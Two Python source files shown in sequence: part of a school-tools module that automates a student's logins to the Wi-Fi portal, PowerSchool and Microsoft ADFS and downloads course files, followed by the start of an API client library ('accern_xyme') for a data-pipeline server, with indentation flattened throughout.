def payload(self, updates={}, *find_args, **find_kwargs):
"""Load completed form of this page.
updates: updates to payload,
*find_args: arguments for BeautifulSoup.find('form'),
**find_kwargs: keyword arguments for BeautifulSoup.find('form').
"""
form = self.form(*find_args, **find_kwargs)
if form is None:
return updates
else:
payload = {
i.get('name'): i.get('value')
for i in form.find_all('input')
if i.get('name') is not None}
payload.update(updates)
return payload
def submit(self, updates={}, find_args=(), find_kwargs={},
*args, **kwargs):
"""Submit form from page.
updates: updates to payload,
find_args: arguments for BeautifulSoup.find('form'),
find_kwargs: keyword arguments for BeautifulSoup.find('form'),
*args: arguments for User.request,
**kwargs: keyword arguments for User.request.
"""
form = self.form(*find_args, **find_kwargs)
if form is None:
return self
else:
method = form.get('method')
action = urljoin(self.url().geturl(), form.get('action'))
payload = self.payload(updates, *find_args, **find_kwargs)
return self.user.request(method, action,
data=payload, *args, **kwargs)
def json(self, *args, **kwargs):
"""Returns response in json format.
*args: arguments for requests.Response.json,
        **kwargs: keyword arguments for requests.Response.json.
"""
return self.response.json(*args, **kwargs)
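# Illustrative sketch (not part of the original module): wrapping a response
# in a Page and submitting the first form on it. The 'user' argument is
# assumed to be a ykpstools.user.User instance; the URL and the form field
# names are hypothetical.
def _example_page_usage(user):
    page = user.get('https://example.com/login')
    return page.submit(updates={'UserName': user.username,
                                'Password': user.password})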
class LoginPageBase(Page):
"""Basic login Page class for pages that involve specific logins."""
def __init__(self, user, *args, **kwargs):
"""Log in to a url in self.login to initialize.
user: a ykpstools.user.User instance, the User this page belongs to,
*args: arguments for self.login,
**kwargs: keyword arguments for self.login.
"""
self.user = user
page = self.login(*args, **kwargs)
super().__init__(self.user, page)
@abc.abstractmethod
def login(self, *args, **kwargs):
"""For login during initialization.
Should override in its subclasses.
"""
page = None # Should override in its subclasses.
return page
class AuthPage(LoginPageBase):
"""Class 'AuthPage' inherits and adds on specific initialization and
attributes for YKPS WiFi Authorization to 'ykpstools.page.Page'.
"""
def __init__(self, user, *args, **kwargs):
"""Log in to WiFi to initialize.
user: a ykpstools.user.User instance, the User this page belongs to.
*args: arguments for POST login
*kwargs: keyword arguments for POST login
"""
super().__init__(user, *args, **kwargs)
def login(self, *args, **kwargs):
"""For login to WiFi during initialization."""
self.mac_connect_to_wifi()
payload = {
'opr': 'pwdLogin',
'userName': self.user.username,
'pwd': self.user.password,
'rememberPwd': '1',
}
return self.user.post('http://1.1.1.3/ac_portal/login.php',
data=payload, *args, **kwargs)
def logout(self, *args, **kwargs):
"""Logouts from YKPS Wi-Fi, with args and kwargs for self.user.get."""
raise NotImplementedError('The school does not implement ajaxlogout.')
@property
def unix_interfaces(self):
if sys.platform == 'darwin':
networksetup = subprocess.check_output(
'networksetup -listallhardwareports |'
'grep "Device: "',
shell=True, stderr=subprocess.DEVNULL).decode()
return [n.strip().split()[-1]
for n in networksetup.splitlines()]
elif sys.platform.startswith('linux'):
return ['eth0', 'wlan0', 'wifi0', 'eth1',
'eth2', 'wlan1', 'ath0', 'ath1', 'ppp0', 'en0', 'en1']
else:
return [NotImplemented]
def mac_connect_to_wifi(self):
if sys.platform == 'darwin':
interface = self.unix_interfaces[0]
is_network_on = subprocess.check_output(
'networksetup -getairportpower {}'.format(interface),
shell=True, stderr=subprocess.DEVNULL
).decode().strip().split()[-1] == 'On'
if not is_network_on:
subprocess.check_output(
'networksetup -setairportpower {} on'.format(interface),
shell=True, stderr=subprocess.DEVNULL)
is_correct_wifi = subprocess.check_output(
'networksetup -getairportnetwork {}'.format(interface),
shell=True, stderr=subprocess.DEVNULL
).decode().strip().split()[-1] in {
'GUEST', 'STUWIRELESS', 'SJWIRELESS'}
if not is_correct_wifi:
subprocess.check_output(
'networksetup -setairportnetwork {} {} {}'.format(
interface, 'STUWIRELESS', ''),
shell=True, stderr=subprocess.DEVNULL)
for i in range(10000):
try:
subprocess.check_output(
'ping 10.2.191.253' # ping blocks until ready
' -c 1 -W 1 -i 0.1', # waits for 0.1 second each loop
shell=True, stderr=subprocess.DEVNULL)
except subprocess.CalledProcessError:
continue
else:
break
else:
pass
@property
def IP(self):
"""Returns IP address in LAN."""
def _is_valid_IP(IP):
"""Internal function. Check if IP is internal IPv4 address."""
if (IP and isinstance(IP, str) and not IP.startswith('127.')
and re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', IP)):
return True
else:
return False
try:
IP = socket.gethostbyname(socket.gethostname())
assert _is_valid_IP(IP)
except (socket.error, AssertionError):
try:
IP = socket.gethostbyname(socket.getfqdn())
assert _is_valid_IP(IP)
except (socket.error, AssertionError):
if sys.platform in {'win32', 'win16', 'dos', 'cygwin'}:
try:
ipconfig = subprocess.check_output('ipconfig /all',
shell=True, stderr=subprocess.DEVNULL).decode()
except subprocess.CalledProcessError as error:
raise GetIPError(
"Can't retrieve IP address.") from error
else:
for ipconfig_line in ipconfig.splitlines():
line = ipconfig_line.strip()
if re.search(r'[\s^]IP(?:v4)?[\s\:$]', line):
# 'IP' or 'IPv4'
IP = line.split()[-1]
if _is_valid_IP(IP):
break
else:
raise GetIPError("Can't retrieve IP address.")
elif (sys.platform == 'darwin'
or sys.platform.startswith('linux')):
interfaces = self.unix_interfaces
for interface in interfaces:
try:
ifconfig = subprocess.check_output(
'ifconfig {} | grep "inet "'.format(interface),
shell=True, stderr=subprocess.DEVNULL).decode()
IP = ifconfig.splitlines()[0].strip().split()[1]
assert _is_valid_IP(IP)
except (subprocess.CalledProcessError,
AssertionError, IndexError):
continue
else:
break
else:
raise GetIPError("Can't retrieve IP address. "
'Maybe your network is disabled or disconnected?')
else:
raise GetIPError('Not implemented OS: ' + sys.platform)
if not _is_valid_IP(IP):
raise GetIPError("Can't retrieve IP address.")
else:
return IP
@property
def MAC(self):
"""Returns MAC address."""
MAC = uuid.UUID(int=uuid.getnode()).hex[-12:].upper()
return ':'.join(MAC[i:i+2] for i in range(0, 11, 2))
class PowerschoolPage(LoginPageBase):
"""Class 'PowerschoolPage' inherits and adds on specific initialization and
attributes for Powerschool to 'ykpstools.page.Page'.
"""
def __init__(self, user):
"""Log in to Powerschool to initialize.
user: a ykpstools.user.User instance, the User this page belongs to.
"""
super().__init__(user)
def login(self):
"""For login to Powerschool during initialization."""
ps_login = self.user.get(
'https://powerschool.ykpaoschool.cn/public/home.html')
if ps_login.url().path == '/guardian/home.html': # If already logged in
return ps_login
payload = ps_login.payload()
payload_updates = {
'dbpw': hmac.new(payload['contextData'].encode('ascii'),
self.user.password.lower().encode('ascii'),
hashlib.md5).hexdigest(),
'account': self.user.username,
'pw': hmac.new(payload['contextData'].encode('ascii'),
base64.b64encode(hashlib.md5(self.user.password.encode('ascii')
).digest()).replace(b'=', b''), hashlib.md5).hexdigest(),
'ldappassword': (self.user.password if 'ldappassword' in payload
else '')
}
submit_login = ps_login.submit(updates=payload_updates)
if submit_login.soup().title.string == 'Student and Parent Sign In':
raise WrongUsernameOrPassword
return submit_login
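# Illustrative sketch (not part of the original module): how PowerschoolPage
# derives the 'dbpw' and 'pw' form fields from the password and the
# 'contextData' nonce found in the login form (the values below are made up).
def _example_powerschool_hashes(context_data='ABCDEF', password='secret'):
    dbpw = hmac.new(context_data.encode('ascii'),
                    password.lower().encode('ascii'),
                    hashlib.md5).hexdigest()
    b64_md5 = base64.b64encode(
        hashlib.md5(password.encode('ascii')).digest()).replace(b'=', b'')
    pw = hmac.new(context_data.encode('ascii'), b64_md5,
                  hashlib.md5).hexdigest()
    return dbpw, pw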
class MicrosoftPage(LoginPageBase):
"""Class 'MicrosoftPage' inherits and adds on specific initialization and
attributes for Microsoft to 'ykpstools.page.Page'.
"""
def __init__(self, user, redirect_to_ms=None):
"""Log in to Microsoft to initialize.
user: a ykpstools.user.User instance, the User this page belongs to,
redirect_to_ms: requests.models.Response or str, the page that a login
page redirects to for Microsoft Office365 login,
defaults to
user.get('https://login.microsoftonline.com/').
"""
super().__init__(user, redirect_to_ms)
def login(self, redirect_to_ms=None):
"""For login to Microsoft during initialization.
redirect_to_ms: requests.models.Response or str, the page that a login
page redirects to for Microsoft Office365 login,
defaults to
self.user.get('https://login.microsoftonline.com/').
"""
if redirect_to_ms is None: # Default if page not specified
redirect_to_ms = self.user.get('https://login.microsoftonline.com')
if len(redirect_to_ms.text().splitlines()) == 1:
# If already logged in
return redirect_to_ms.submit()
ms_login_CDATA = redirect_to_ms.CDATA()
ms_get_credential_type_payload = json.dumps({ # have to use json
'username': self.user.username + '@ykpaoschool.cn',
'isOtherIdpSupported': True,
'checkPhones': False,
'isRemoteNGCSupported': False,
'isCookieBannerShown': False,
'isFidoSupported': False,
'originalRequest': ms_login_CDATA['sCtx'],
'country': ms_login_CDATA['country'],
'flowToken': ms_login_CDATA['sFT'],
})
ms_get_credential_type = self.user.post(
'https://login.microsoftonline.com'
'/common/GetCredentialType?mkt=en-US',
data=ms_get_credential_type_payload
).json()
adfs_login = self.user.get(
ms_get_credential_type['Credentials']['FederationRedirectUrl'])
adfs_login_payload = adfs_login.payload(updates={
'ctl00$ContentPlaceHolder1$UsernameTextBox': self.user.username,
'ctl00$ContentPlaceHolder1$PasswordTextBox': self.user.password,
})
adfs_login_form_url = adfs_login.form().get('action')
if urlparse(adfs_login_form_url).netloc == '':
# If intermediate page exists
adfs_intermediate_url = urljoin(
'https://adfs.ykpaoschool.cn', adfs_login_form_url)
adfs_intermediate = self.user.post(adfs_intermediate_url,
data=adfs_login_payload)
adfs_intermediate_payload = adfs_intermediate.payload()
back_to_ms_url = adfs_intermediate.form().get('action')
if urlparse(back_to_ms_url).netloc == '':
# If stays in adfs, username or password is incorrect
raise WrongUsernameOrPassword
else:
# If intermediate page does not exist
back_to_ms_url = adfs_login_form_url
adfs_intermediate_payload = adfs_login_payload
ms_confirm = self.user.post(back_to_ms_url,
data=adfs_intermediate_payload)
if ms_confirm.url().netloc != 'login.microsoftonline.com':
# If ms_confirm is skipped, sometimes happens
return ms_confirm
ms_confirm_CDATA = ms_confirm.CDATA()
ms_confirm_payload = {
'LoginOptions': 0,
'ctx': ms_confirm_CDATA['sCtx'],
'hpgrequestid': ms_confirm_CDATA['sessionId'],
'flowToken': ms_confirm_CDATA['sFT'],
'canary': ms_confirm_CDATA['canary'],
'i2': None,
'i17': None,
'i18': None,
'i19': 66306,
}
ms_out_url = 'https://login.microsoftonline.com/kmsi'
ms_out = self.user.post(ms_out_url, data=ms_confirm_payload)
if ms_out_url in ms_out.url().geturl():
# If encounters 'Working...' page
return ms_out.submit()
else:
return ms_out
class PowerschoolLearningPage(LoginPageBase):
"""Class 'PowerschoolLearningPage' inherits and adds on specific
initialization and attributes for Powerschool Learning to
'ykpstools.page.Page'.
"""
def __init__(self, user):
"""Log in to Powerschool Learning to initialize.
user: a ykpstools.user.User instance, the User this page belongs to.
"""
super().__init__(user)
def login(self):
"""For login to Powerschool Learning during initialization."""
psl_login = self.user.get(urljoin(
'https://ykpaoschool.learning.powerschool.com',
'/do/oauth2/office365_login'))
if psl_login.url().netloc == 'ykpaoschool.learning.powerschool.com':
# If already logged in
return psl_login
else:
return self.user.microsoft(psl_login)
def _append_class(self, link, i):
"""Internal function. Append a class to self._classes."""
response = self.user.get(link)
self._classes[i] = self.Class(self.user, response)
def get_classes(self, max_threads=None, from_cache=True):
"""The 'get_classes' property parses and returns a list of
self.Class by GET'ing and caching all classes asynchronously.
max_threads: int or None, the maximum number of threads running at a
time. None means no restriction, defaults to None.
from_cache: whether to load classes from cache, defaults to True.
"""
if not hasattr(self, '_classes') or not from_cache:
divs = self.soup().find_all('div', class_='eclass_filter')
self._classes = [None] * len(divs)
threads = []
for i, div in enumerate(divs):
link = urljoin(self.url().geturl(), div.find('a').get('href'))
threads.append(threading.Thread(
target=self._append_class, args=(link, i)))
if max_threads is not None:
if len(threads) >= max_threads:
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threads = []
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return self._classes
class Class(Page):
"""Class 'Class' is an attribute of PowerschoolLearningPage and an
abstraction of a class found in Powerschool Learning.
"""
@property
def name(self):
return self.soup().find(
'h1', id='cms_page_eclass_name').get_text(strip=True)
@staticmethod
def ensure_directory(directory):
"""os.makedirs(directory) if directory doesn't exist."""
try:
os.makedirs(directory)
except FileExistsError:
                if not os.path.isdir(directory):
raise
# TODO, finish all this mess
def download_all_to(self, directory='.', max_threads=None,
from_cache=True, blocking=False):
"""Download all downloadable files in this Class asynchronously,
chached.
directory: str, directory to download to, defaults to '.',
max_threads: int or None, the maximum number of threads running at
a time. None means no restriction, defaults to None,
from_cache: whether to load classes from cache, defaults to True.
"""
for topic in self.get_topics(max_threads, from_cache):
for subtopic in self.get_subtopics_from_topic(topic):
names_to_downloads = self.get_names_to_downloads(subtopic)
if names_to_downloads == {}:
continue
download_directory = os.path.join(
os.path.abspath(directory),
self.get_topic_name(topic),
self.get_subtopic_name(subtopic))
self.ensure_directory(download_directory)
for name in names_to_downloads:
download_content = self.user.get(
names_to_downloads[name]).response.content
file_directory = os.path.join(download_directory, name)
with open(file_directory, 'wb') as file:
file.write(download_content)
def _append_topic(self, link, i):
"""Internal function. Append a topic soup to self._topics."""
soup = self.user.get(link).soup()
self._topics[i] = soup
def get_topics(self, max_threads=None, from_cache=True):
"""Get all topics, in soups.
max_threads: int or None, the maximum number of threads running at
a time. None means no restriction, defaults to None.
from_cache: whether to load classes from cache, defaults to True.
"""
if not hasattr(self, '_topics') or not from_cache:
as_ = self.soup().find_all('a', id=re.compile(r'plink_\d+'))
self._topics = [None] * len(as_)
threads = []
for i, a in enumerate(as_):
link = urljoin(self.url().geturl(), a.get('href'))
threads.append(threading.Thread(
target=self._append_topic, args=(link, i)))
if max_threads is not None:
if len(threads) >= max_threads:
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threads = []
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return self._topics
def get_subtopics_from_topic(self, topic):
return topic.find_all('div',
id=re.compile(r'box_\d+'), class_=['cms_box', 'cms_box_file'])
def get_names_to_downloads(self, subtopic):
download_elements = subtopic.find_all('a',
attrs={'data-event-action': 'download'})
names_to_downloads = {
a.string: urljoin(self.url().geturl(), a.get('href'))
for a in download_elements}
return names_to_downloads
def get_topic_name(self, topic):
add_selected_js = topic.find('script', type='text/javascript',
text=re.compile(r'sidebarSel\(\d+\);')).string
selected_id = re.findall(
r'sidebarSel\((\d+)\);', add_selected_js)[0]
return topic.find('a', id='plink_{}'.format(selected_id)).string
def get_subtopic_name(self, subtopic):
return subtopic.find('span', class_='box_title').string
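# Illustrative sketch (not part of the original module): logging in to
# Powerschool Learning and downloading every class's files. The 'user'
# argument is assumed to be a ykpstools.user.User instance and the target
# directory is hypothetical.
def _example_download_everything(user):
    psl = PowerschoolLearningPage(user)
    for cls in psl.get_classes(max_threads=4):
        cls.download_all_to(directory='./downloads', max_threads=4)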
|
accern_xyme.py
|
from typing import (
Any,
Callable,
cast,
Dict,
IO,
Iterable,
Iterator,
List,
Optional,
overload,
Set,
TextIO,
Tuple,
TYPE_CHECKING,
Union,
)
import io
import os
import pickle
import sys
import json
import time
import weakref
import inspect
import textwrap
import threading
import contextlib
from io import BytesIO, StringIO
from urllib.parse import urlparse, urlunparse
from pathlib import PosixPath, PurePath
from graphviz.backend import ExecutableNotFound
import pandas as pd
import requests
from requests import Response
from requests.exceptions import HTTPError, RequestException
from typing_extensions import Literal
import quick_server
from .util import (
async_compute,
ByteResponse,
content_to_csv_bytes,
df_to_csv_bytes,
get_age,
get_file_hash,
get_file_upload_chunk_size,
get_max_retry,
get_progress_bar,
get_retry_sleep,
has_graph_easy,
interpret_ctype,
is_jupyter,
maybe_json_loads,
merge_ctype,
safe_opt_num,
ServerSideError,
to_bool,
)
from .types import (
AllowedCustomImports,
BlobFilesResponse,
BlobInit,
BlobOwner,
BlobTypeResponse,
BlobURIResponse,
CacheStats,
CopyBlob,
DagCreate,
DagDef,
DagDupResponse,
DagInfo,
DagInit,
DagList,
DagPrettyNode,
DagReload,
DagStatus,
DeleteBlobResponse,
DynamicResults,
DynamicStatusResponse,
ESQueryResponse,
FlushAllQueuesResponse,
InCursors,
InstanceStatus,
JSONBlobAppendResponse,
KafkaGroup,
KafkaMessage,
KafkaOffsets,
KafkaThroughput,
KafkaTopicNames,
KafkaTopics,
KnownBlobs,
MinimalQueueStatsResponse,
ModelInfo,
ModelParamsResponse,
ModelReleaseResponse,
ModelVersionResponse,
NamespaceList,
NamespaceUpdateSettings,
NodeChunk,
NodeCustomCode,
NodeCustomImports,
NodeDef,
NodeDefInfo,
NodeInfo,
NodeState,
NodeStatus,
NodeTiming,
NodeTypeResponse,
NodeTypes,
NodeUserColumnsResponse,
PrettyResponse,
PutNodeBlob,
QueueMode,
QueueStatsResponse,
QueueStatus,
ReadNode,
S3Config,
SetNamedSecret,
SettingsObj,
TaskStatus,
Timing,
TimingResult,
Timings,
TritonModelsResponse,
UploadFilesResponse,
UUIDResponse,
VersionResponse,
WorkerScale,
)
if TYPE_CHECKING:
WVD = weakref.WeakValueDictionary[str, 'DagHandle']
else:
WVD = weakref.WeakValueDictionary
API_VERSION = 4
DEFAULT_URL = "http://localhost:8080"
DEFAULT_NAMESPACE = "default"
METHOD_DELETE = "DELETE"
METHOD_FILE = "FILE"
METHOD_GET = "GET"
METHOD_LONGPOST = "LONGPOST"
METHOD_POST = "POST"
METHOD_PUT = "PUT"
PREFIX = "/xyme"
INPUT_CSV_EXT = ".csv"
INPUT_TSV_EXT = ".tsv"
INPUT_ZIP_EXT = ".zip"
INPUT_EXT = [INPUT_ZIP_EXT, INPUT_CSV_EXT, INPUT_TSV_EXT]
FUNC = Callable[..., Any]
CUSTOM_NODE_TYPES = {
"custom_data",
"custom_json",
"custom_json_to_data",
"custom_json_join_data",
}
NO_RETRY = [METHOD_POST, METHOD_FILE]
class AccessDenied(Exception):
pass
# *** AccessDenied ***
class LegacyVersion(Exception):
def __init__(self, api_version: int) -> None:
super().__init__(f"expected {API_VERSION} got {api_version}")
self._api_version = api_version
def get_api_version(self) -> int:
return self._api_version
# *** LegacyVersion ***
class XYMEClient:
def __init__(
self,
url: str,
token: Optional[str],
namespace: str) -> None:
self._url = url.rstrip("/")
if token is None:
token = os.environ.get("XYME_SERVER_TOKEN")
self._token = token
self._namespace = namespace
self._last_action = time.monotonic()
self._auto_refresh = True
self._dag_cache: WVD = weakref.WeakValueDictionary()
self._node_defs: Optional[Dict[str, NodeDefInfo]] = None
def get_version() -> int:
server_version = self.get_server_version()
try:
return int(server_version["api_version"])
except (ValueError, KeyError) as e:
raise LegacyVersion(1) from e
api_version = get_version()
if api_version < API_VERSION:
raise LegacyVersion(api_version)
self._api_version = api_version
def get_api_version(self) -> int:
return self._api_version
def set_auto_refresh(self, is_auto_refresh: bool) -> None:
self._auto_refresh = is_auto_refresh
def is_auto_refresh(self) -> bool:
return self._auto_refresh
def refresh(self) -> None:
self._node_defs = None
def _maybe_refresh(self) -> None:
if self.is_auto_refresh():
self.refresh()
# FIXME: Do we still need this?
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
old_refresh = self.is_auto_refresh()
try:
self.set_auto_refresh(False)
yield old_refresh
finally:
self.set_auto_refresh(old_refresh)
def _raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]] = None,
add_prefix: bool = True,
add_namespace: bool = True,
api_version: Optional[int] = None) -> Tuple[BytesIO, str]:
file_resets = {}
can_reset = True
if files is not None:
for (fname, fbuff) in files.items():
if hasattr(fbuff, "seek"):
file_resets[fname] = fbuff.seek(0, io.SEEK_CUR)
else:
can_reset = False
def reset_files() -> bool:
if files is None:
return True
if not can_reset:
return False
for (fname, pos) in file_resets.items():
files[fname].seek(pos, io.SEEK_SET)
return True
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_bytes(
method,
path,
args,
files,
add_prefix,
add_namespace,
api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if retry >= max_retry:
raise
if not reset_files():
raise
if method in NO_RETRY:
raise
time.sleep(get_retry_sleep())
retry += 1
def _raw_request_str(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
add_namespace: bool = True,
api_version: Optional[int] = None) -> TextIO:
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_str(
method,
path,
args,
add_prefix,
add_namespace,
api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if method in NO_RETRY:
raise
if retry >= max_retry:
raise
time.sleep(get_retry_sleep())
retry += 1
def _raw_request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
add_namespace: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
file_resets = {}
can_reset = True
if files is not None:
for (fname, fbuff) in files.items():
if hasattr(fbuff, "seek"):
file_resets[fname] = fbuff.seek(0, io.SEEK_CUR)
else:
can_reset = False
def reset_files() -> bool:
if files is None:
return True
if not can_reset:
return False
for (fname, pos) in file_resets.items():
files[fname].seek(pos, io.SEEK_SET)
return True
retry = 0
max_retry = get_max_retry()
while True:
try:
try:
return self._fallible_raw_request_json(
method,
path,
args,
add_prefix,
add_namespace,
files,
api_version)
except HTTPError as e:
if e.response.status_code in (403, 404, 500):
retry = max_retry
raise e
except RequestException:
if retry >= max_retry:
raise
if not reset_files():
raise
if method in NO_RETRY:
raise
time.sleep(get_retry_sleep())
retry += 1
def _fallible_raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]],
add_prefix: bool,
add_namespace: bool,
api_version: Optional[int]) -> Tuple[BytesIO, str]:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
if add_namespace:
args["namespace"] = self._namespace
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
# NOTE: no content type check -- will be handled by interpret_ctype
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
if method == METHOD_FILE:
if files is None:
raise ValueError(f"file method must have files: {files}")
req = requests.post(
url,
data=args,
files={
key: (
getattr(value, "name", key),
value,
"application/octet-stream",
) for (key, value) in files.items()
},
headers=headers)
check_error(req)
return BytesIO(req.content), req.headers["content-type"]
raise ValueError(f"unknown method {method}")
def _fallible_raw_request_str(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool,
add_namespace: bool,
api_version: Optional[int]) -> TextIO:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
if add_namespace:
args["namespace"] = self._namespace
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
if req.headers["content-type"] == "application/problem+json":
raise ServerSideError(json.loads(req.text)["errMessage"])
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return StringIO(req.text)
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return StringIO(req.text)
raise ValueError(f"unknown method {method}")
def _fallible_raw_request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool,
add_namespace: bool,
files: Optional[Dict[str, IO[bytes]]],
api_version: Optional[int]) -> Dict[str, Any]:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
if add_namespace:
args["namespace"] = self._namespace
if method != METHOD_FILE and files is not None:
            raise ValueError(
                f"files are only allowed for the FILE method "
                f"(got {method}): {files}")
req = None
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
if req.headers["content-type"] == "application/problem+json":
raise ServerSideError(json.loads(req.text)["errMessage"])
try:
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_FILE:
if files is None:
raise ValueError(f"file method must have files: {files}")
req = requests.post(
url,
data=args,
files={
key: (
getattr(value, "name", key),
value,
"application/octet-stream",
) for (key, value) in files.items()
},
headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_PUT:
req = requests.put(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_DELETE:
req = requests.delete(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_LONGPOST:
args["token"] = self._token
try:
res = quick_server.worker_request(url, args)
if "errMessage" in res:
raise ServerSideError(res["errMessage"])
return res
except quick_server.WorkerError as e:
if e.get_status_code() == 403:
raise AccessDenied(e.args) from e
raise e
raise ValueError(f"unknown method {method}")
except json.decoder.JSONDecodeError as e:
if req is None:
raise
raise ValueError(req.text) from e
def request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]] = None,
add_prefix: bool = True,
add_namespace: bool = True,
api_version: Optional[int] = None) -> Tuple[BytesIO, str]:
return self._raw_request_bytes(
method, path, args, files, add_prefix, add_namespace, api_version)
def request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
add_namespace: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
return self._raw_request_json(
method, path, args, add_prefix, add_namespace, files, api_version)
def get_server_version(self) -> VersionResponse:
return cast(VersionResponse, self.request_json(
METHOD_GET,
f"{PREFIX}/v{API_VERSION}/version",
{},
add_prefix=False,
add_namespace=False))
def get_namespaces(self) -> List[str]:
return cast(NamespaceList, self.request_json(
METHOD_GET, "/namespaces", {}))["namespaces"]
def get_dags(self) -> List[str]:
return [
res["dag"]
for res in self.get_dag_times(retrieve_times=False)[1]
]
def get_dag_ages(self) -> List[Dict[str, Optional[str]]]:
cur_time, dags = self.get_dag_times(retrieve_times=True)
return [
{
"config_error": dag_status["config_error"],
"created": get_age(cur_time, dag_status["created"]),
"dag": dag_status["dag"],
"deleted": get_age(cur_time, dag_status["deleted"]),
"latest": get_age(cur_time, dag_status["latest"]),
"oldest": get_age(cur_time, dag_status["oldest"]),
}
for dag_status in sorted(dags, key=lambda el: (
el["config_error"] is None,
safe_opt_num(el["oldest"]),
safe_opt_num(el["latest"]),
el["dag"]))
]
def get_dag_times(self, retrieve_times: bool = True) -> Tuple[
float, List[DagStatus]]:
res = cast(DagList, self.request_json(
METHOD_GET, "/dags", {
"retrieve_times": int(retrieve_times),
}))
return res["cur_time"], res["dags"]
def get_dag(self, dag_uri: str) -> 'DagHandle':
res = self._dag_cache.get(dag_uri)
if res is not None:
return res
res = DagHandle(self, dag_uri)
self._dag_cache[dag_uri] = res
return res
def get_blob_handle(self, uri: str, is_full: bool = False) -> 'BlobHandle':
return BlobHandle(self, uri, is_full=is_full)
def get_node_defs(self) -> Dict[str, NodeDefInfo]:
self._maybe_refresh()
if self._node_defs is not None:
return self._node_defs
res = cast(NodeTypes, self.request_json(
METHOD_GET, "/node_types", {}, add_namespace=False))["info"]
self._node_defs = res
return res
def create_new_blob(self, blob_type: str) -> str:
return cast(BlobInit, self.request_json(
METHOD_POST, "/blob_init", {
"type": blob_type,
}, add_namespace=False))["blob"]
def get_blob_owner(self, blob_uri: str) -> BlobOwner:
return cast(BlobOwner, self.request_json(
METHOD_GET, "/blob_owner", {
"blob": blob_uri,
}))
def set_blob_owner(
self,
blob_uri: str,
dag_id: Optional[str] = None,
node_id: Optional[str] = None,
external_owner: bool = False) -> BlobOwner:
return cast(BlobOwner, self.request_json(
METHOD_PUT, "/blob_owner", {
"blob": blob_uri,
"owner_dag": dag_id,
"owner_node": node_id,
"external_owner": external_owner,
}))
def create_new_dag(
self,
username: Optional[str] = None,
dagname: Optional[str] = None,
index: Optional[int] = None) -> str:
return cast(DagInit, self.request_json(
METHOD_POST, "/dag_init", {
"user": username,
"name": dagname,
"index": index,
}))["dag"]
def get_blob_type(self, blob_uri: str) -> BlobTypeResponse:
return cast(BlobTypeResponse, self.request_json(
METHOD_GET, "/blob_type", {
"blob_uri": blob_uri,
},
))
def get_csv_blob(self, blob_uri: str) -> 'CSVBlobHandle':
blob_type = self.get_blob_type(blob_uri)
if not blob_type["is_csv"]:
raise ValueError(f"blob: {blob_uri} is not csv type")
return CSVBlobHandle(self, blob_uri, is_full=False)
def get_custom_code_blob(self, blob_uri: str) -> 'CustomCodeBlobHandle':
blob_type = self.get_blob_type(blob_uri)
if not blob_type["is_custom_code"]:
raise ValueError(f"blob: {blob_uri} is not custom code type")
return CustomCodeBlobHandle(self, blob_uri, is_full=False)
def get_json_blob(self, blob_uri: str) -> 'JSONBlobHandle':
blob_type = self.get_blob_type(blob_uri)
if not blob_type["is_json"]:
raise ValueError(f"blob: {blob_uri} is not json type")
return JSONBlobHandle(self, blob_uri, is_full=False)
def duplicate_dag(
self,
dag_uri: str,
dest_uri: Optional[str] = None,
copy_nonowned_blobs: Optional[bool] = None,
retain_nonowned_blobs: bool = False,
warnings_io: Optional[IO[Any]] = sys.stderr) -> str:
if copy_nonowned_blobs is None:
copy_nonowned_blobs = not retain_nonowned_blobs
elif warnings_io is not None:
warnings_io.write(
"copy_nonowned_blobs is deprecated; "
